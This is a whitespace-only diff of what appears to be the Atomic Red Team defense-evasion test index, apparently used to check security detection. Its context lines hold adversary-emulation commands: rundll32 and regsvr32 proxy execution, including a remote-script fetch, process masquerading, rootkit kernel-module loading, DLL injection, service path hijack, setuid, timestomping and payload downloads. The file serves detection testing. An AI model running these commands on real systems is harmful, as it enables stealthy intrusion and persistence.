@@ -32415,7 +32415,7 @@ defense-evasion:
       description: 'Regsvr32.exe is a command-line program used to register and unregister
         OLE controls. Upon execution, calc.exe will be launched.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -32436,10 +32436,10 @@ defense-evasion:
       - description: 'AllTheThingsx86.dll must exist on disk at specified location
           (#{dll_name})
 
-'
+          '
         prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
@@ -32447,14 +32447,14 @@ defense-evasion:
         command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
           /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} )
 
-'
+          '
         name: command_prompt
     - name: Regsvr32 Registering Non DLL
       auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421
       description: 'Replicating observed Gozi maldoc behavior registering a dll with
         an altered extension
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -32474,13 +32474,13 @@ defense-evasion:
       dependencies:
       - description: 'Test requires a renamed dll file
 
-'
+          '
         prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 )
 
-'
+          '
         get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
 
-'
+          '
       executor:
         name: command_prompt
         elevation_required: false
@@ -32596,7 +32596,7 @@ defense-evasion:
           %SystemRoot%\Temp\lsass.exe /B
         cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Masquerading as Linux crond process.
       auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556
@@ -32612,7 +32612,7 @@ defense-evasion:
           /tmp/crond
         cleanup_command: 'rm /tmp/crond
 
-'
+          '
         name: sh
     - name: Masquerading - cscript.exe running as notepad.exe
       auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0
@@ -32628,7 +32628,7 @@ defense-evasion:
           cmd.exe /c %APPDATA%\notepad.exe /B
         cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Masquerading - wscript.exe running as svchost.exe
       auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23
@@ -32644,7 +32644,7 @@ defense-evasion:
           cmd.exe /c %APPDATA%\svchost.exe /B
         cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Masquerading - powershell.exe running as taskhostw.exe
       auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
@@ -32660,7 +32660,7 @@ defense-evasion:
           cmd.exe /K %APPDATA%\taskhostw.exe
         cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Masquerading - non-windows exe running as windows exe
       auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086
@@ -32683,10 +32683,10 @@ defense-evasion:
       dependencies:
       - description: 'Exe file to copy must exist on disk at specified location (#{inputfile})
 
-'
+          '
         prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}"
@@ -32697,14 +32697,14 @@ defense-evasion:
           Stop-Process -ID $myT1036_003
         cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Masquerading - windows exe running as different windows exe
       auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0
       description: 'Copies a windows exe, renames it as another windows exe, and launches
         it to masquerade as second windows exe
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -32723,7 +32723,7 @@ defense-evasion:
           Stop-Process -ID $myT1036_003
         cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Malicious process Masquerading as LSM.exe
       auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
@@ -33005,7 +33005,7 @@ defense-evasion:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-'
+          '
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -33018,10 +33018,10 @@ defense-evasion:
       - description: 'PsExec tool from Sysinternals must exist on disk at specified
           location (#{psexec_path})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
 
-'
+          '
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
           Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -33130,7 +33130,7 @@ defense-evasion:
       auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
       description: 'Loadable Kernel Module based Rootkit
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -33155,10 +33155,10 @@ defense-evasion:
       dependencies:
       - description: 'The kernel module must exist on disk at specified location (#{rootkit_path})
 
-'
+          '
         prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
 
-'
+          '
         get_prereq_command: |
           if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
           cp #{rootkit_source_path}/* #{temp_folder}/
@@ -33168,17 +33168,17 @@ defense-evasion:
       executor:
         command: 'sudo insmod #{rootkit_path}
 
-'
+          '
         cleanup_command: 'sudo rmmod #{rootkit_name}
 
-'
+          '
         name: sh
         elevation_required: true
     - name: Loadable Kernel Module based Rootkit
       auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
       description: 'Loadable Kernel Module based Rootkit
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -33203,11 +33203,11 @@ defense-evasion:
       dependencies:
       - description: 'The kernel module must exist on disk at specified location (#{rootkit_path})
 
-'
+          '
         prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then
           exit 0; else exit 1; fi;
 
-'
+          '
         get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder};
           touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd
           #{temp_folder}; make        \nsudo cp #{temp_folder}/#{rootkit_name}.ko
@@ -33216,7 +33216,7 @@ defense-evasion:
       executor:
         command: 'sudo modprobe #{rootkit_name}
 
-'
+          '
         cleanup_command: |
           sudo modprobe -r #{rootkit_name}
           sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
@@ -33247,15 +33247,15 @@ defense-evasion:
       dependencies:
       - description: 'puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{puppetstrings_path}) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe"
           -OutFile "#{puppetstrings_path}"
 
-'
+          '
       executor:
         name: command_prompt
         command: "#{puppetstrings_path} #{driver_path}\n"
@@ -33383,7 +33383,7 @@ defense-evasion:
       description: 'Test execution of a remote script using rundll32.exe. Upon execution
         notepad.exe will be opened.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -33394,7 +33394,7 @@ defense-evasion:
       executor:
         command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
 
-'
+          '
         name: command_prompt
     - name: Rundll32 execute VBscript command
       auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
@@ -33412,7 +33412,7 @@ defense-evasion:
       executor:
         command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
 
-'
+          '
         name: command_prompt
     - name: Rundll32 advpack.dll Execution
       auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89
@@ -33431,17 +33431,17 @@ defense-evasion:
       dependencies:
       - description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
 
-'
+          '
         prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
       executor:
         command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
 
-'
+          '
         name: command_prompt
     - name: Rundll32 ieadvpack.dll Execution
       auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9
@@ -33461,17 +33461,17 @@ defense-evasion:
       dependencies:
       - description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
 
-'
+          '
         prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
       executor:
         command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
 
-'
+          '
         name: command_prompt
     - name: Rundll32 syssetup.dll Execution
       auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125
@@ -33490,10 +33490,10 @@ defense-evasion:
       dependencies:
       - description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
 
-'
+          '
         prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
@@ -33501,7 +33501,7 @@ defense-evasion:
         command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
           128 .\#{inf_to_execute}
 
-'
+          '
         name: command_prompt
     - name: Rundll32 setupapi.dll Execution
       auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19
@@ -33520,10 +33520,10 @@ defense-evasion:
       dependencies:
       - description: 'Inf file must exist on disk at specified location (#{inf_to_execute})
 
-'
+          '
         prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
@@ -33531,7 +33531,7 @@ defense-evasion:
         command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
           .\#{inf_to_execute}
 
-'
+          '
         name: command_prompt
     - name: Execution of HTA and VBS Files using Rundll32 and URL.dll
       auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3
@@ -33554,7 +33554,7 @@ defense-evasion:
       description: 'Executes the LaunchApplication function in pcwutl.dll to proxy
         execution of an executable.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -33565,7 +33565,7 @@ defense-evasion:
       executor:
         command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
 
-'
+          '
         name: command_prompt
   T1134.005:
     technique:
@@ -33964,7 +33964,7 @@ defense-evasion:
       description: 'Change Service registry ImagePath of a bengin service to a malicious
         file
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -33984,22 +33984,22 @@ defense-evasion:
       dependencies:
       - description: 'The service must exist (#{weak_service_name})
 
-'
+          '
         prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
 
-'
+          '
       executor:
         command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
           /f /v ImagePath /d "#{malicious_service_path}"
 
-'
+          '
         cleanup_command: 'sc.exe delete #{weak_service_name}
 
-'
+          '
         name: command_prompt
   T1548.001:
     technique:
@@ -34055,7 +34055,7 @@ defense-evasion:
       description: 'Make, change owner, and change file attributes on a C source code
         file
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -34081,7 +34081,7 @@ defense-evasion:
       auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
       description: 'This test sets the SetUID flag on a file in Linux and macOS.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -34097,14 +34097,14 @@ defense-evasion:
           sudo chmod u+s #{file_to_setuid}
         cleanup_command: 'sudo rm #{file_to_setuid}
 
-'
+          '
         name: sh
         elevation_required: true
     - name: Set a SetGID flag on file
       auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
       description: 'This test sets the SetGID flag on a file in Linux and macOS.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -34120,7 +34120,7 @@ defense-evasion:
           sudo chmod g+s #{file_to_setuid}
         cleanup_command: 'sudo rm #{file_to_setuid}
 
-'
+          '
         name: sh
         elevation_required: true
   T1218:
@@ -34179,7 +34179,7 @@ defense-evasion:
       description: 'Injects arbitrary DLL into running process specified by process
         ID. Requires Windows 10.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -34195,17 +34195,17 @@ defense-evasion:
       dependencies:
       - description: 'T1218.dll must exist on disk at specified location (#{dll_payload})
 
-'
+          '
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
       executor:
         command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
@@ -34213,7 +34213,7 @@ defense-evasion:
       description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
         Requires Windows 10.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -34224,14 +34224,14 @@ defense-evasion:
       executor:
         command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
 
-'
+          '
         name: command_prompt
     - name: Register-CimProvider - Execute evil dll
       auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655
       description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
         note this dll can be served up via SMB
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -34243,17 +34243,17 @@ defense-evasion:
       dependencies:
       - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload})
 
-'
+          '
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
       executor:
         command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
 
-'
+          '
         name: command_prompt
     - name: InfDefaultInstall.exe .inf Execution
       auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
@@ -34272,17 +34272,17 @@ defense-evasion:
       dependencies:
       - description: 'INF file must exist on disk at specified location (#{inf_to_execute})
 
-'
+          '
         prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
       executor:
         command: 'InfDefaultInstall.exe #{inf_to_execute}
 
-'
+          '
         name: command_prompt
     - name: ProtocolHandler.exe Downloaded a Suspicious File
       auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2
@@ -34290,7 +34290,7 @@ defense-evasion:
         Office.  On successful execution you should see Microsoft Word launch a blank
         file.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -34303,15 +34303,15 @@ defense-evasion:
       - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe
           must be provided
 
-'
+          '
         prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft
           Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'write-host "Install Microsoft Word or provide correct
           path."
 
-'
+          '
       executor:
         name: command_prompt
         elevation_required: false
@@ -34323,7 +34323,7 @@ defense-evasion:
       description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a
         .Net assembly that launches calc.exe
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -34345,15 +34345,15 @@ defense-evasion:
         prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: 'write-host ".Net must be installed for this test to work
           correctly."
 
-'
+          '
       executor:
         command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt
 
-'
+          '
         name: powershell
         elevation_required: false
     - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
@@ -34361,7 +34361,7 @@ defense-evasion:
       description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe
         running a .Net assembly that launches calc.exe
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -34390,7 +34390,7 @@ defense-evasion:
         get_prereq_command: 'write-host "you need to rename workflow complier before
           you run this test"
 
-'
+          '
       executor:
         command: "#{renamed_binary} #{xml_payload} output.txt\n"
         name: powershell
@@ -34433,7 +34433,7 @@ defense-evasion:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name}
           -ModulePath #{module_path}'
@@ -34500,14 +34500,14 @@ defense-evasion:
       executor:
         command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
 
-'
+          '
         name: command_prompt
     - name: manage-bde.wsf Signed Script Command Execution
       auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a
       description: 'Executes the signed manage-bde.wsf script with options to execute
         an arbitrary command.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -34521,7 +34521,7 @@ defense-evasion:
           cscript %windir%\System32\manage-bde.wsf
         cleanup_command: 'set comspec=%windir%\System32\cmd.exe
 
-'
+          '
         name: command_prompt
   T1027.002:
     technique:
@@ -34597,10 +34597,10 @@ defense-evasion:
       executor:
         command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 
-'
+          '
         cleanup_command: 'rm /tmp/packed_bin
 
-'
+          '
         name: sh
     - name: Binary packed by UPX, with modified headers (linux)
       auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1
@@ -34619,10 +34619,10 @@ defense-evasion:
       executor:
         command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 
-'
+          '
         cleanup_command: 'rm /tmp/packed_bin
 
-'
+          '
         name: sh
     - name: Binary simply packed by UPX
       auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20
@@ -34639,10 +34639,10 @@ defense-evasion:
       executor:
         command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 
-'
+          '
         cleanup_command: 'rm /tmp/packed_bin
 
-'
+          '
         name: sh
     - name: Binary packed by UPX, with modified headers
       auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d
@@ -34661,10 +34661,10 @@ defense-evasion:
       executor:
         command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 
-'
+          '
         cleanup_command: 'rm /tmp/packed_bin
 
-'
+          '
         name: sh
   T1036.006:
     technique:
@@ -34718,7 +34718,7 @@ defense-evasion:
       auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f
       description: 'Space After Filename
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -34934,7 +34934,7 @@ defense-evasion:
       auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
       description: 'Common Sudo enumeration methods.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -34948,7 +34948,7 @@ defense-evasion:
         This is dangerous to modify without using ''visudo'', do not do this on a
         production system.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -34963,7 +34963,7 @@ defense-evasion:
       description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
         to modify without using ''visudo'', do not do this on a production system.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -35073,7 +35073,7 @@ defense-evasion:
           | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization
           Environment detected"; fi;
 
-'
+          '
     - name: Detect Virtualization Environment (Windows)
       auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
       description: 'Windows Management Instrumentation(WMI) objects contains system
@@ -35083,7 +35083,7 @@ defense-evasion:
         This is meant to find the result of Not supported, which is the result if
         run in a virtual machine
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -35100,7 +35100,7 @@ defense-evasion:
         the system. If it''s a virtual machine, one of the device manufacturer will
         be a Virtualization Software.
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -35110,7 +35110,7 @@ defense-evasion:
           ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
           detected''; fi;
 
-'
+          '
   T1542.001:
     technique:
       id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada
@@ -35350,7 +35350,7 @@ defense-evasion:
       executor:
         command: 'start #{docx_file}
 
-'
+          '
         name: command_prompt
   T1055.003:
     technique:
@@ -35593,7 +35593,7 @@ defense-evasion:
       auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810
       description: 'Stomps on the access timestamp of a file
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -35605,13 +35605,13 @@ defense-evasion:
       executor:
         command: 'touch -a -t 197001010000.00 #{target_filename}
 
-'
+          '
         name: sh
     - name: Set a file's modification timestamp
       auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52
       description: 'Stomps on the modification timestamp of a file
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -35623,7 +35623,7 @@ defense-evasion:
       executor:
         command: 'touch -m -t 197001010000.00 #{target_filename}
 
-'
+          '
         name: sh
     - name: Set a file's creation timestamp
       auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
@@ -35669,7 +35669,7 @@ defense-evasion:
       executor:
         command: 'touch -acmr #{reference_file_path} #{target_file_path}
 
-'
+          '
         name: sh
     - name: Windows - Modify file creation timestamp with PowerShell
       auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
@@ -35692,10 +35692,10 @@ defense-evasion:
       - description: 'A file must exist at the path (#{file_path}) to change the creation
           time on
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Path #{file_path} -Force | Out-Null
           Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -35703,10 +35703,10 @@ defense-evasion:
         command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}"
           }
 
-'
+          '
         cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Windows - Modify file last modified timestamp with PowerShell
       auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2
@@ -35729,10 +35729,10 @@ defense-evasion:
       - description: 'A file must exist at the path (#{file_path}) to change the modified
           time on
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Path #{file_path} -Force | Out-Null
           Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -35740,10 +35740,10 @@ defense-evasion:
         command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}"
           }
 
-'
+          '
         cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Windows - Modify file last access timestamp with PowerShell
       auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62
@@ -35766,10 +35766,10 @@ defense-evasion:
       - description: 'A file must exist at the path (#{file_path}) to change the last
           access time on
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Path #{file_path} -Force | Out-Null
           Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
@@ -35777,10 +35777,10 @@ defense-evasion:
         command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}"
           }
 
-'
+          '
         cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Windows - Timestomp a File
       auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43
@@ -35798,25 +35798,25 @@ defense-evasion:
       dependencies:
       - description: 'timestomp.ps1 must be present in #{file_path}.
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1"
           -OutFile "#{file_path}\timestomp.ps1"
 
-'
+          '
       - description: 'kxwn.lock must be present in #{file_path}.
 
-'
+          '
         prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else
           {exit 1}
 
-'
+          '
         get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File
 
-'
+          '
       executor:
         command: |
           import-module #{file_path}\timestomp.ps1
@@ -36790,10 +36790,10 @@ defense-evasion:
       - description: 'Test requrires a file to take ownership of to be located at
           (#{file_folder_to_own})
 
-'
+          '
         prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-'
+          '
         get_prereq_command: |
           mkdir #{file_folder_to_own}
           echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt
@@ -36801,7 +36801,7 @@ defense-evasion:
       executor:
         command: 'takeown.exe /f #{file_folder_to_own} /r
 
-'
+          '
         name: command_prompt
     - name: cacls - Grant permission to specified user or group recursively
       auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485
@@ -36824,10 +36824,10 @@ defense-evasion:
       dependencies:
       - description: 'Test requrires a file to modify to be located at (#{file_or_folder})
 
-'
+          '
         prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-'
+          '
         get_prereq_command: |
           mkdir #{file_or_folder}
           echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt
@@ -36835,7 +36835,7 @@ defense-evasion:
       executor:
         command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F
 
-'
+          '
         name: command_prompt
     - name: attrib - Remove read-only attribute
       auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0
@@ -36853,10 +36853,10 @@ defense-evasion:
       dependencies:
       - description: 'Test requrires a file to modify to be located at (#{file_or_folder})
 
-'
+          '
         prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-'
+          '
         get_prereq_command: |
           mkdir #{file_or_folder}
           echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
@@ -36866,7 +36866,7 @@ defense-evasion:
       executor:
         command: 'attrib.exe -r #{file_or_folder}\*.* /s
 
-'
+          '
         name: command_prompt
     - name: attrib - hide file
       auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c
@@ -36884,10 +36884,10 @@ defense-evasion:
       dependencies:
       - description: 'Test requires a file to modify to be located at (#{file_or_folder})
 
-'
+          '
         prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-'
+          '
         get_prereq_command: |
           mkdir #{file_or_folder}
           echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
@@ -36925,18 +36925,18 @@ defense-evasion:
       - description: 'Backup of original folder permissions should exist (for use
           in cleanup commands)
 
-'
+          '
         prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-'
